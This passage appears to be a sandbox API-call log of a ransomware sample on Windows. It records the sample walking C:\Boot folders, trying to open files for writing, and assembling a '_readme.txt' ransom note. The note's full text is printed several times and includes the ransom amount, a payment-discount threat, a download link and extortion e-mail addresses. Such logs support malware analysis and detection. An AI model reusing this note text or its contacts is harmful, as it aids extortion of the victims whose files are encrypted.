Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.325] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0179.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.325] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.325] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.326] PathFindFileNameW (pszPath="") returned="" [0179.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.326] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.326] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0179.326] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0179.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.326] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.327] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0179.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.327] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0179.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.327] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.327] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.327] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.329] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*" (normalized: "c:\\boot\\nl-nl\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.329] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.329] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.329] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0179.329] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.330] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.330] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.331] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.331] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.345] HeapFree (in: 